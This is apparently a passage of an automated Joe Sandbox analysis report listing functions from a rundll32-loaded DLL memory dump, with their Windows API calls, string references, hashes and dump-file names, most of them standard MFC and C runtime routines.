Instruction Fuzzy Hash: 50A18C35C04249DBCF11EFA4E985AEEBBF0FF04350FA0415AE914AB291D734AE41DB61

Uniqueness

Uniqueness Score: -1.00%

Function 1002D5D0 Relevance: 9.1, APIs: 6, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1002D5FF
SysAllocString.OLEAUT32(00000000), ref: 1002D650
SysAllocString.OLEAUT32(00000000), ref: 1002D674

Part of subcall function 100200B9: __EH_prolog3.LIBCMT ref: 100200C0

SysAllocString.OLEAUT32(00000000), ref: 1002D6CC
SysAllocString.OLEAUT32(00000000), ref: 1002D6F5
SysAllocString.OLEAUT32(00000000), ref: 1002D724

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocString$H_prolog3_memset
String ID:
API String ID: 842698744-0
Opcode ID: 508acb920ccba7a207f47e88a798d4189b9ed575a01c86aa1581d938c190cd50
Instruction ID: 4ca028c9b4d427f08f2d669533113988f62624cee2fc7606aac8abf48e723189
Opcode Fuzzy Hash: 508acb920ccba7a207f47e88a798d4189b9ed575a01c86aa1581d938c190cd50
Instruction Fuzzy Hash: E9414A34900304CFDB24EFB8D891AADB7B5EF04314F50852EF9659B2A2DB74A854CF55

Uniqueness

Uniqueness Score: -1.00%

Function 100169E1 Relevance: 9.1, APIs: 6, Instructions: 115threadwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 10016936: GetParent.USER32(100010EC), ref: 10016989
Part of subcall function 10016936: GetLastActivePopup.USER32(100010EC), ref: 10016998
Part of subcall function 10016936: IsWindowEnabled.USER32(100010EC), ref: 100169AD
Part of subcall function 10016936: EnableWindow.USER32(100010EC,00000000), ref: 100169C0

EnableWindow.USER32(?,00000001), ref: 10016A2E
GetWindowThreadProcessId.USER32(?,?), ref: 10016A3C
GetCurrentProcessId.KERNEL32 ref: 10016A46
SendMessageA.USER32 ref: 10016A5B
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10016AD8
EnableWindow.USER32(?,00000001), ref: 10016B14

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID:
API String ID: 1877664794-0
Opcode ID: f56e269d1f7720d56fa1c58fd8a6d78852bfdb5100da494152acd8aedeab4fb9
Instruction ID: f13ef48dc5fb0c484cec2fa7b3f992f2dc6d3b1b42596072abe369902371925a
Opcode Fuzzy Hash: f56e269d1f7720d56fa1c58fd8a6d78852bfdb5100da494152acd8aedeab4fb9
Instruction Fuzzy Hash: 3B415B72A00258DBEB20CFA4CC81BDD76A8EF09350F614119E949AB281E770D9848F52

Uniqueness

Uniqueness Score: -1.00%

Function 10016936 Relevance: 9.1, APIs: 6, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(100010EC,000000F0), ref: 10016968
GetParent.USER32(100010EC), ref: 10016976
GetParent.USER32(100010EC), ref: 10016989
GetLastActivePopup.USER32(100010EC), ref: 10016998
IsWindowEnabled.USER32(100010EC), ref: 100169AD
EnableWindow.USER32(100010EC,00000000), ref: 100169C0

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
Instruction ID: 154aafdfd528b469a8bf80fc48512ff59873e22bfc4d6b8fcadc8b05587993e6
Opcode Fuzzy Hash: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
Instruction Fuzzy Hash: D111A57260133697D661DB698E80B1BB6ECDF9EAE1F120115ED00EF254EB70DC808696

Uniqueness

Uniqueness Score: -1.00%

Function 10020559 Relevance: 9.0, APIs: 6, Instructions: 45COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 10020568
GetDlgCtrlID.USER32 ref: 1002057C
GetWindowLongA.USER32(00000000,000000F0), ref: 1002058A
GetWindowRect.USER32 ref: 1002059C
PtInRect.USER32(?,?,?), ref: 100205AC
GetWindow.USER32(?,00000005), ref: 100205B9

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
Instruction ID: 9197e044a219b4c4c22350dcb983fe24fb7029e94376554506d026f7e511957d
Opcode Fuzzy Hash: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
Instruction Fuzzy Hash: 3B01A235501739EBEB11DF549C48E9F3BADEF4A791F404011FD10D2061E730DA018B99

Uniqueness

Uniqueness Score: -1.00%

Function 1001D992 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 234COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1001D9C0

Strings

@, xrefs: 1001DACC
@, xrefs: 1001DB65
AfxFrameOrView80s, xrefs: 1001DA86
AfxMDIFrame80s, xrefs: 1001DA61

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
API String ID: 2102423945-4122032997
Opcode ID: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
Instruction ID: bbe41a20c7329c8f9bdc0efe2c46215e461a01fcfe5e7bc54fed728f21783543
Opcode Fuzzy Hash: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
Instruction Fuzzy Hash: B0816076D04219AADB40EFA4D481BDEBBF8EF04384F518566F909EB181E774DAC4CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10021D88 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126stringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 10021DB2
lstrlenA.KERNEL32(?), ref: 10021DFA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 10021E14

Strings

System, xrefs: 10021DAE

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ByteCharGlobalLockMultiWidelstrlen
String ID: System
API String ID: 1529587224-3470857405
Opcode ID: 33974d9c05b04c687ac20437ddad08aa00536e5ed05beed44e1f4e08908d61b5
Instruction ID: 0e81d0f59cd66082c3aa20aff96d3ec22f48ed16ea157d431ad3d5bc96dc32b7
Opcode Fuzzy Hash: 33974d9c05b04c687ac20437ddad08aa00536e5ed05beed44e1f4e08908d61b5
Instruction Fuzzy Hash: B441C275900215DFDF14CFA4DD85AEEBBB5EF14310F51822AE802DB285EB70A946CB50

Uniqueness

Uniqueness Score: -1.00%

Function 100233C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 100233CB
GetModuleHandleA.KERNEL32(?,1004B63C,00000000,?), ref: 10023496
GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 100234A6

Strings

MFCM80ReleaseManagedReferences, xrefs: 100234A0
mfcm80.dll, xrefs: 10023485

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: AddressH_prolog3_HandleModuleProc
String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
API String ID: 2418878492-2500072749
Opcode ID: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
Instruction ID: 416d3485c59068a364c2a46f33bf17d30033b20eabc5154db7a9307924c289c3
Opcode Fuzzy Hash: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
Instruction Fuzzy Hash: 45318F74A006449FCF06EFA0D8957AD77F9EF48300F914098E905EB292DB78EE04CB55

Uniqueness

Uniqueness Score: -1.00%

Function 10015723 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92windowCOMMON

Download Yara Rule

APIs

GetMenuCheckMarkDimensions.USER32 ref: 1001573B
_memset.LIBCMT ref: 1001579D
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 100157EF
LoadBitmapA.USER32 ref: 10015807

Strings

, xrefs: 1001575C

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID:
API String ID: 4271682439-3916222277
Opcode ID: 0828224e24eec93523923ff328a5ceada98e4d45539c90ba39b5b31778de99bb
Instruction ID: fd313e63bbbbf4de8925541e866d87c57cd6a5f11e69b9eb671f3de319ba3105
Opcode Fuzzy Hash: 0828224e24eec93523923ff328a5ceada98e4d45539c90ba39b5b31778de99bb
Instruction Fuzzy Hash: 2831C072A00216DFEB10CF78DDCAAAE7BB5EB44645F15052AE506EF2C1E631E9448750

Uniqueness

Uniqueness Score: -1.00%

Function 10023B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92comCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 10023B2B
GetObjectA.GDI32(100188B8,0000003C,?), ref: 10023B7D
GetDeviceCaps.GDI32(?,0000005A), ref: 10023BED
OleCreateFontIndirect.OLEAUT32(00000020,1004B6CC), ref: 10023C19

Strings

, xrefs: 10023B8A

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
String ID:
API String ID: 2429671754-3916222277
Opcode ID: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
Instruction ID: e2743fe1d96de1c748b152781f443ff04db9fb8b7a9177862e5f836bc5268938
Opcode Fuzzy Hash: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
Instruction Fuzzy Hash: 5A41AD38D01289DEDB11CFE4D951ADDFBF4EF18340F20816AE945EB292EB749A44CB11

Uniqueness

Uniqueness Score: -1.00%

Function 10018D05 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10018D43
GetSystemMetrics.USER32 ref: 10018D5B
GetSystemMetrics.USER32 ref: 10018D62

Strings

DISPLAY, xrefs: 10018D7F
B, xrefs: 10018D22

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: System$Metrics$InfoParameters
String ID: B$DISPLAY
API String ID: 3136151823-3316187204
Opcode ID: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
Instruction ID: a878fcb1cedf1c60654c719a4428af0d7f153658fed9e58891951680bc1a7591
Opcode Fuzzy Hash: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
Instruction Fuzzy Hash: 7F119471900334EBDF11DF54AC8465A7BA8EF1A794F004061FE08AE086D270DB40CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 10016D6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON

Download Yara Rule

Strings

Edit, xrefs: 10016DBA

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Edit
API String ID: 0-554135844
Opcode ID: aeba8321252689d607d43ce831c94e9037d76912a5b48d9cd96901cd2708aa45
Instruction ID: d7da207644b64a2d982eb74dcfc255ba7c8492391b78acd90f64b6ebdbaccf44
Opcode Fuzzy Hash: aeba8321252689d607d43ce831c94e9037d76912a5b48d9cd96901cd2708aa45
Instruction Fuzzy Hash: 5401C034B00222ABEA50DA35DC45B5AB6F9EF4E795F120524F512EE0A1DF70ECC1C666

Uniqueness

Uniqueness Score: -1.00%

Function 10023C5A Relevance: 7.6, APIs: 5, Instructions: 108windowthreadCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10023C61
SendMessageA.USER32 ref: 10023CD9
GetBkColor.GDI32(?), ref: 10023CE2
GetTextColor.GDI32(?), ref: 10023CEE
GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 10023D80

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Color$H_prolog3LocaleMessageSendTextThread
String ID:
API String ID: 187318432-0
Opcode ID: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
Instruction ID: d28fad7a3843e667b269742353e4bf680cf5f7ebce9377355bc1d9e2da6f7a14
Opcode Fuzzy Hash: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
Instruction Fuzzy Hash: 99416A38400746DFCB20DF64D845A9EB7F1FF08310F618959F9969B2A1EB74E941CB51

Uniqueness

Uniqueness Score: -1.00%

Function 10016461 Relevance: 7.6, APIs: 5, Instructions: 75registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 10016480
RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1001649F
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 100164BD
RegDeleteKeyA.ADVAPI32(?,?), ref: 10016538
RegCloseKey.ADVAPI32(?), ref: 10016543

Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocatorCloseDebugDeleteEnumH_prolog3_catchHeapOpen
String ID:
API String ID: 69039007-0
Opcode ID: 0669dfe3de0cc61b0444232be26762e4236a4070ce21c008c0579ea5e657dd0e
Instruction ID: 2ee7fd04e7e526f2a2658ba16ac7fadb449e12f7dad9b6db0157347413a913f7
Opcode Fuzzy Hash: 0669dfe3de0cc61b0444232be26762e4236a4070ce21c008c0579ea5e657dd0e
Instruction Fuzzy Hash: 3A21D075D0025ADBDB21CB94CC416EEB7B0EF08350F10412AED41AB290EB30AE84DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1002B3A9 Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

GetMapMode.GDI32(?), ref: 1002B3B9
GetDeviceCaps.GDI32(?,00000058), ref: 1002B3F3
GetDeviceCaps.GDI32(?,0000005A), ref: 1002B3FC

Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001ED8C
Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001EDA9

MulDiv.KERNEL32 ref: 1002B420
MulDiv.KERNEL32 ref: 1002B42B

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: ad45f33bd95501225e01621eadf3d29f248a2335d01e386e7c92b4ca8057da2f
Instruction ID: 63e99b0baf6d5dcfdd2b5bb48b7ec33f4fcd9c2a57d1919fdecc035dbf7e745c
Opcode Fuzzy Hash: ad45f33bd95501225e01621eadf3d29f248a2335d01e386e7c92b4ca8057da2f
Instruction Fuzzy Hash: 2D110E71600A14EFDB21AF55CC84C0EBBE9EF89350B514829FA8597361DB31ED01CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1002B437 Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

GetMapMode.GDI32(?), ref: 1002B447
GetDeviceCaps.GDI32(?,00000058), ref: 1002B481
GetDeviceCaps.GDI32(?,0000005A), ref: 1002B48A

Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED23
Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED40

MulDiv.KERNEL32 ref: 1002B4AE
MulDiv.KERNEL32 ref: 1002B4B9

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: 6f199a3495fbdd21d567dc82426adb66683fca9deaa291746216ef97ded9c58c
Instruction ID: 3f65263faca37ec2066e18a28c5c11a55be6ae6448755079bbf75ecdaa8dd8b2
Opcode Fuzzy Hash: 6f199a3495fbdd21d567dc82426adb66683fca9deaa291746216ef97ded9c58c
Instruction Fuzzy Hash: 2511CE75600A14EFDB21AF55CC84C1EBBEAEF89750B118819FA8597361DB31EC01DB90

Uniqueness

Uniqueness Score: -1.00%

Function 100203DD Relevance: 7.6, APIs: 5, Instructions: 53stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 10020407
_memset.LIBCMT ref: 10020424
GetWindowTextA.USER32(?,00000000,00000100), ref: 1002043E
lstrcmpA.KERNEL32(00000000,?), ref: 10020450
SetWindowTextA.USER32(?,?), ref: 1002045C

Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
String ID:
API String ID: 289641511-0
Opcode ID: 77b0c5cd9ac0cc3ff83a367ab42858fc436f0c74e7fc05fbf85526c4b9223b41
Instruction ID: 8c1f3c136944a2c7f84d91cd4eaa34ef9436e2c15ebeed6ca137d0836ccfc0fa
Opcode Fuzzy Hash: 77b0c5cd9ac0cc3ff83a367ab42858fc436f0c74e7fc05fbf85526c4b9223b41
Instruction Fuzzy Hash: CE01DBB5600314A7E711DF64DDC4BDF77ADEB19341F408065F646D3142EAB09E448B61

Uniqueness

Uniqueness Score: -1.00%

Function 100329FD Relevance: 7.5, APIs: 5, Instructions: 43threadCOMMON

Download Yara Rule

APIs

Part of subcall function 100310AD: _doexit.LIBCMT ref: 100310B5

___set_flsgetvalue.LIBCMT ref: 10032A0A

Part of subcall function 10035135: TlsGetValue.KERNEL32 ref: 1003513B
Part of subcall function 10035135: __decode_pointer.LIBCMT ref: 1003514B
Part of subcall function 10035135: TlsSetValue.KERNEL32(00000000,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 10035158

Part of subcall function 1003511A: TlsGetValue.KERNEL32 ref: 10035124

__freefls@4.LIBCMT ref: 10032A60

Part of subcall function 1003515F: __decode_pointer.LIBCMT ref: 1003516D

GetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 10032A32
ExitThread.KERNEL32 ref: 10032A39
GetCurrentThreadId.KERNEL32(00000000,?,00000000,?,?), ref: 10032A3F

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
